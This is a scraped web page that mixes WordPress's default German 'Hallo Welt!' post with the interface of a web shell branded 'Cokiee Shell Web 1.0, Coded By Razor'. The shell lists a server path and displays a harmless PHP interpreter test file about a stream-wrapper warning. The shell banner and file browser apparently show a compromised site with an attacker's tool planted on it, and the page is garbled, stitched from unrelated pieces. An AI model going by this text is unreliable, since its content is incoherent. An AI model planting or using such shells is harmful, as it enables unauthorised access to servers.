Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/standard/tests/file/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/standard/tests/file/bug71287.phpt |
--TEST-- Bug #71287 (Error message contains hexadecimal instead of decimal number) --FILE-- <?php class Stream { public function stream_open($path, $mode, $options, $opened_path) { return true; } public function stream_write($data) { return strlen($data) - 2; } } stream_wrapper_register('test', Stream::class); file_put_contents('test://file.txt', 'foobarbaz'); ?> --EXPECTF-- Warning: file_put_contents(): Only 7 of 9 bytes written, possibly out of free disk space in %sbug71287.php on line %d
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare